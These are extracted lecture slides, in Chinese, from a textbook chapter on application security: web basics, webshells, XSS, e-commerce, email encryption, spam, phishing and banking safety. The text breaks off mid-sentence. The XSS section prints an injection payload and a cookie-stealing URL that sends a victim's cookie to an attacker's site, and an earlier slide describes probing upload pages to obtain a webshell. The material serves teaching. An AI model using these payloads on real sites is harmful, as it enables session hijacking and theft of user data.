第7章應(yīng)用安全技術(shù)主要內(nèi)容7.1Web應(yīng)用安全技術(shù)7.2電子商務(wù)安全7.3電子郵件加密技術(shù)7.4防垃圾郵件技術(shù)7.5網(wǎng)絡(luò)防釣魚(yú)技術(shù)7.6QQ安全使用7.7網(wǎng)上銀行賬戶安全7.8使用WinHex7.1Web應(yīng)用安全技術(shù)Web技術(shù)簡(jiǎn)介與安全分析應(yīng)用安全基礎(chǔ)實(shí)例--xss跨站攻擊技術(shù)2023/2/13Web技術(shù)簡(jiǎn)介與安全分析Web服務(wù)器也稱為WWW服務(wù)器，主要功能是提供網(wǎng)上信息瀏覽服務(wù)。UNIX/Linux系統(tǒng)中的Web服務(wù)器多采用Apache服務(wù)器軟件；Windows系統(tǒng)中的Web服務(wù)器多采用IIS服務(wù)器軟件。Web瀏覽器Web瀏覽器用于向服務(wù)器發(fā)送資源索取請(qǐng)求，并將接收到的信息進(jìn)行解碼和顯示。常見(jiàn)的Web瀏覽器軟件有Firefox、IE、Chrome等。通信協(xié)議Web瀏覽器與服務(wù)器之間遵循HTTP協(xié)議進(jìn)行通訊傳輸。2023/2/14HTML和JavaScript語(yǔ)言HTML是一種用來(lái)制作網(wǎng)頁(yè)的標(biāo)記語(yǔ)言，它不需要編譯，可以直接由瀏覽器執(zhí)行，屬于瀏覽器解釋型語(yǔ)言。JavaScript是一種基于對(duì)象和事件驅(qū)動(dòng)并具有相對(duì)安全性的客戶端腳本語(yǔ)言。同時(shí)也是一種廣泛用于客戶端Web開(kāi)發(fā)的腳本語(yǔ)言，常用來(lái)給HTML網(wǎng)頁(yè)添加動(dòng)態(tài)功能，比如響應(yīng)用戶的各種操作。練習(xí)P268Web技術(shù)簡(jiǎn)介與安全分析Web技術(shù)簡(jiǎn)介與安全分析Webshell“web”的含義是顯然需要服務(wù)器開(kāi)放web服務(wù)，“shell”的含義是取得對(duì)服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為匿名用戶（入侵者）通過(guò)網(wǎng)站端口對(duì)網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動(dòng)態(tài)腳本的形式出現(xiàn)，也有人稱之為網(wǎng)站的后門(mén)工具。上傳漏洞在瀏覽器地址欄中網(wǎng)址的后面加上“/upfile.asp”（或與此含義相近的名字），如果顯示“上傳格式不正確”等類似的提示，說(shuō)明存在上傳漏洞，可以用上傳工具得到WebShell。暴庫(kù)暴庫(kù)就是通過(guò)猜測(cè)數(shù)據(jù)庫(kù)文件所在的路徑來(lái)將其下載，得到該文件后就可以破解該網(wǎng)站的用戶密碼了。旁注利用同一主機(jī)上面不同網(wǎng)站的漏洞得到webshell，從而利用主機(jī)上的程序或者是服務(wù)所暴露的用戶所在的物理路徑進(jìn)行入侵。Web技術(shù)簡(jiǎn)介與安全分析CGI通用網(wǎng)關(guān)接口，它是一段程序，運(yùn)行在服務(wù)器上，提供同客戶端HTML頁(yè)面的接口，通俗的講CGI就像是一座橋，把網(wǎng)頁(yè)和WEB服務(wù)器中的執(zhí)行程序連接起來(lái)，它把HTML接收的指令傳遞給服務(wù)器，再把服務(wù)器執(zhí)行的結(jié)果返還給HTML頁(yè)；用CGI可以實(shí)現(xiàn)處理表格，數(shù)據(jù)庫(kù)查詢，發(fā)送電子郵件等許多操作。CGI使網(wǎng)頁(yè)變得不是靜態(tài)的，而是交互式的。CGI可以用任何一種語(yǔ)言編寫(xiě)，只要這種語(yǔ)言具有標(biāo)準(zhǔn)輸入、輸出和環(huán)境變量。

Web技術(shù)簡(jiǎn)介與安全分析Web系統(tǒng)架構(gòu)用戶使用Web瀏覽器，通過(guò)網(wǎng)絡(luò)連接到Web服務(wù)器。用戶發(fā)出請(qǐng)求，服務(wù)器根據(jù)請(qǐng)求的URL，找到對(duì)應(yīng)的網(wǎng)頁(yè)文件，發(fā)送給用戶。網(wǎng)頁(yè)文件是HTML/XML格式的文本文件，Web瀏覽器有一個(gè)解釋器，將網(wǎng)頁(yè)文本轉(zhuǎn)換成Web瀏覽器中看到的網(wǎng)頁(yè)。

Web技術(shù)簡(jiǎn)介與安全分析靜態(tài)網(wǎng)頁(yè):網(wǎng)頁(yè)內(nèi)容不會(huì)發(fā)生變化，除非網(wǎng)頁(yè)設(shè)計(jì)者修改了網(wǎng)頁(yè)的內(nèi)容。不能實(shí)現(xiàn)和瀏覽網(wǎng)頁(yè)的用戶之間的交互。信息流向是單向的，即從服務(wù)器到瀏覽器。服務(wù)器不能根據(jù)用戶的選擇調(diào)整返回給用戶的內(nèi)容。Web技術(shù)簡(jiǎn)介與安全分析動(dòng)態(tài)網(wǎng)頁(yè)：能與后臺(tái)數(shù)據(jù)庫(kù)進(jìn)行交互，數(shù)據(jù)傳遞。也就是說(shuō)，網(wǎng)頁(yè)URL的后綴不是.htm、.html、.shtml、.xml等靜態(tài)網(wǎng)頁(yè)的常見(jiàn)形動(dòng)態(tài)網(wǎng)頁(yè)制作格式，而是以..asp、.jsp、.php、.perl、.cgi等形式為后綴，并且在動(dòng)態(tài)網(wǎng)頁(yè)網(wǎng)址中有一個(gè)標(biāo)志性的符號(hào)——“?”。動(dòng)態(tài)網(wǎng)頁(yè)一般以數(shù)據(jù)庫(kù)技術(shù)為基礎(chǔ)，可以大大降低網(wǎng)站維護(hù)的工作量采用動(dòng)態(tài)網(wǎng)頁(yè)技術(shù)的網(wǎng)站可以實(shí)現(xiàn)更多的功能，如用戶注冊(cè)、用戶登錄、在線調(diào)查、用戶管理、訂單管理等等動(dòng)態(tài)網(wǎng)頁(yè)實(shí)際上并不是獨(dú)立存在于服務(wù)器上的網(wǎng)頁(yè)文件，只有當(dāng)用戶請(qǐng)求時(shí)服務(wù)器才返回一個(gè)完整的網(wǎng)頁(yè)Web技術(shù)簡(jiǎn)介與安全分析Web系統(tǒng)架構(gòu)安全分析服務(wù)器系統(tǒng)漏洞Web服務(wù)應(yīng)用漏洞密碼暴力破解Web技術(shù)簡(jiǎn)介與安全分析應(yīng)用安全基礎(chǔ)網(wǎng)頁(yè)防篡改系統(tǒng)網(wǎng)頁(yè)內(nèi)容過(guò)濾技術(shù)實(shí)時(shí)信息過(guò)濾廣告軟件（adware）間諜軟件（spyware）瀏覽器劫持惡意共享軟件2023/2/113使用安全性比較高的瀏覽器,不要瀏覽不良網(wǎng)站,不要輕易安裝共享軟件、盜版軟件或免費(fèi)軟件。xss跨站攻擊技術(shù)XSS又稱CSS（CrossSiteScript），即跨站腳本攻擊，它指的是惡意攻擊者向Web頁(yè)面里插入惡意代碼，當(dāng)用戶瀏覽該頁(yè)時(shí)，嵌入Web里面的惡意代碼會(huì)被執(zhí)行，從而達(dá)到攻擊者的特殊目的。比如獲取用戶的Cookie，導(dǎo)航到惡意網(wǎng)站，攜帶木馬等。XSS屬于被動(dòng)式的攻擊。2023/2/114用戶提交的變量沒(méi)有經(jīng)過(guò)完整過(guò)濾Html字符或者根本就沒(méi)有經(jīng)過(guò)過(guò)濾就放到了數(shù)據(jù)庫(kù)中，一個(gè)惡意用戶提交的Html代碼被其它瀏覽該網(wǎng)站的用戶訪問(wèn)，通過(guò)這些Html代碼也就間接控制了瀏覽者的瀏覽器，就可以做很多的事情，如：竊取敏感信息、引導(dǎo)訪問(wèn)者的瀏覽器去訪問(wèn)惡意網(wǎng)站等。Xss跨站腳本攻擊原理一類是來(lái)自內(nèi)部的攻擊，主要指的是利用程序自身的漏洞，構(gòu)造跨站語(yǔ)句。另一類則是來(lái)自外部的攻擊，主要指的自己構(gòu)造XSS跨站漏洞網(wǎng)頁(yè)或者尋找非目標(biāo)機(jī)以外的有跨站漏洞的網(wǎng)頁(yè)。如當(dāng)我們要滲透一個(gè)站點(diǎn)，我們自己構(gòu)造一個(gè)有跨站漏洞的網(wǎng)頁(yè)，然后構(gòu)造跨站語(yǔ)句，通過(guò)結(jié)合其它技術(shù)，如社會(huì)工程學(xué)等，欺騙目標(biāo)服務(wù)器的管理員打開(kāi)。XSS的種類XSS是如何發(fā)生的呢假如有下面一個(gè)textbox<inputtype="text"name="address1"value="value1from">value1from是來(lái)自用戶的輸入，如果用戶不是輸入value1from,而是輸入“><script>alert(document.cookie)</script><!-那么就會(huì)變成<inputtype="text"name="address1"value=""><script>alert(document.cookie)</script><!-">事件被觸發(fā)的時(shí)候嵌入的JavaScript代碼將會(huì)被執(zhí)行，

攻擊的威力，取決于用戶輸入了什么樣的腳本。XSS之所以會(huì)發(fā)生，是因?yàn)橛脩糨斎氲臄?shù)據(jù)變成了代碼。所以我們需要對(duì)用戶輸入的數(shù)據(jù)進(jìn)行HTMLEncode處理。將其中的"中括號(hào)"，“單引號(hào)”，“引號(hào)”之類的特殊字符進(jìn)行編碼。XSS攻擊舉例Tom發(fā)現(xiàn)了V中的一個(gè)頁(yè)面有XSS漏洞，例如:/search.asp?term=apple服務(wù)器中Search.asp頁(yè)面的代碼大概如下：

<html>

<title></title>

<body>

Resultsfor<%Request.QueryString("term")%>

...

</body>

</html>Tom先建立一個(gè)網(wǎng)站,

用來(lái)接收“偷”來(lái)的信息。

然后Tom構(gòu)造一個(gè)惡意的url(如下),通過(guò)某種方式(郵件，QQ)發(fā)給Monica /search.asp?term=<script>window.open("?cookie="+document.cookie)</script>Monica點(diǎn)擊了這個(gè)URL，嵌入在URL中的惡意Javascript代碼就會(huì)在Monica的瀏覽器中執(zhí)行.那么Monica在網(wǎng)站的cookie,就會(huì)被發(fā)送到badguy網(wǎng)站中。這樣Monica在

的信息就被Tom盜了XSS攻擊舉例7.2電子商務(wù)安全廣義的電子商務(wù)定義為，使用各種電子工具從事商務(wù)活動(dòng)；狹義電子商務(wù)定義為，主要利用Internet從事商務(wù)或活動(dòng)。電子商務(wù)涵蓋了兩個(gè)方面離不開(kāi)互聯(lián)網(wǎng)這個(gè)平臺(tái)，沒(méi)有了網(wǎng)絡(luò)，就稱不上為電子商務(wù)通過(guò)互聯(lián)網(wǎng)完成的是一種商務(wù)活動(dòng)

電子商務(wù)的安全控制要求安全交易標(biāo)準(zhǔn)目前安全電子交易的手段2023/2/1207.3電子郵件加密技術(shù)pgp2023/2/1217.4防垃圾郵件技術(shù)什么是垃圾郵件垃圾郵件的危害性避免垃圾郵件的幾種方法實(shí)例：垃圾郵件的處理2023/2/1227.5網(wǎng)絡(luò)防釣魚(yú)技術(shù)什么是網(wǎng)絡(luò)釣魚(yú)通過(guò)大量發(fā)送聲稱來(lái)自于銀行或其他知名機(jī)構(gòu)的欺騙性垃圾郵件，意圖引誘收信人給出敏感信息（如用戶名、口令、帳號(hào)ID、ATM或信用卡詳細(xì)信息）的一種攻擊方式。最典型的網(wǎng)絡(luò)釣魚(yú)攻擊將收信人引誘到一個(gè)通過(guò)精心設(shè)計(jì)與目標(biāo)組織的網(wǎng)站非常相似的釣魚(yú)網(wǎng)站上，并獲取收信人在此網(wǎng)站上輸入的個(gè)人敏感信息，通常這個(gè)攻擊過(guò)程不會(huì)讓受害者警覺(jué)。防備網(wǎng)絡(luò)釣魚(yú)的一般常識(shí)Windows用戶對(duì)網(wǎng)絡(luò)釣魚(yú)的防范Linux用戶對(duì)網(wǎng)絡(luò)釣魚(yú)的防范2023/2/1237.6qq安全使用密碼安全設(shè)置密碼保護(hù)2023/2/1247.7網(wǎng)上銀行賬戶安全什么是網(wǎng)上銀行網(wǎng)上銀行的發(fā)展網(wǎng)上銀行安全隱患和可